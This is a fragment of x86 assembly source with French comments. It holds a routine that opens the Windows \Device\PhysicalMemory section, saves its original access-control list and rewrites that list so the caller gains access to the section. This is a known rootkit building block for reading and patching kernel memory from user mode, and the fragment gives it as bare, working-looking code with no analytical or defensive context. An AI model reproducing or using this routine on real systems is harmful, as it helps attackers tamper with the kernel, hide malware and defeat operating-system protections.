; *******************************************************************
; *     Change les proprits de la DACL de DevicePhysicalMemory    *
; *******************************************************************

change_security :
    pushad

    push offset OBJET_ATTRIBUTES
    push WRITE_DAC or READ_CONTROL
    push offset handle_opensection
    call dword ptr [@NtOpenSection]
    or eax,eax
    jne sortie_erreur_change_security

    push offset SecurityDescriptor
    push 0
    push offset DACL
    push 0
    push 0
    push DACL_SECURITY_INFORMATION
    push SE_KERNEL_OBJECT
    push handle_opensection
    call GetSecurityInfo
    or eax,eax
    jne sortie_erreur_change_security  

;---------------------------------- Sauve la DACL d'origine ---------
    mov esi,dword ptr [DACL]
    movzx eax,word ptr [esi+2]      ; AclSize
    push eax

    push PAGE_READWRITE
    push MEM_COMMIT     
    push eax
    push 0
    call VirtualAlloc
    or eax,eax
    Je sortie_erreur_change_security
  
    mov dword ptr [DACL_original],eax
  
    pop ecx
    xchg edi,eax
    cld
    rep movsb       ; sauvegarde l'ACL original
;---------------------------------------------------------------------   
    push offset new_DACL
    push dword ptr [DACL]
    push offset EXPLICIT_ACCESS 
    push 1
    call SetEntriesInAclA
    or eax,eax
    jne sortie_erreur_change_security

    push 0
    push dword ptr [new_DACL]
    push 0
    push 0
    push DACL_SECURITY_INFORMATION
    push SE_KERNEL_OBJECT
    push dword ptr [handle_opensection]
    call SetSecurityInfo
    or eax,eax
    jne sortie_erreur_change_security

    push dword ptr [SecurityDescriptor]
    call LocalFree 
    or eax,eax
    jne sortie_erreur_change_security

    push dword ptr [new_DACL]
    call LocalFree
    or eax,eax
    jne sortie_erreur_change_security

    push dword ptr [handle_opensection]
    call dword ptr [@NtClose]
    or eax,eax
    jne sortie_erreur_change_security
    mov dword ptr [handle_opensection],0
    mov eax, STATUS_SUCCESS
    
sortie_change_security :
    mov dword ptr [esp+_eax], eax
    popad
    ret 
sortie_erreur_change_security :
    mov eax, STATUS_ERROR
    jmp sortie_change_security
    





